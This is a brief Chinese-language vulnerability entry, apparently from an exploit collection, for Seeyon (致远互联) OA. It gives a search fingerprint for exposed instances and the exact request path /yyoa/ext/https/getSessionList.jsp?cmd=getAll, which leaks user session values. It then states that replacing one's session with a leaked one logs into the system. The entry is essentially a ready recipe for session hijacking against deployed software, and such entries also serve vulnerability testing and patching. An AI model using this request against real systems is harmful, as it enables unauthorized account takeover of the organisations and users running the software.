通过使用存在漏洞的请求时,会回显部分用户的Session值,导致出现任意登录的情况
未知
app="致远互联-OA"
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
回显Session则存在漏洞
通过替换 Session即可登陆系统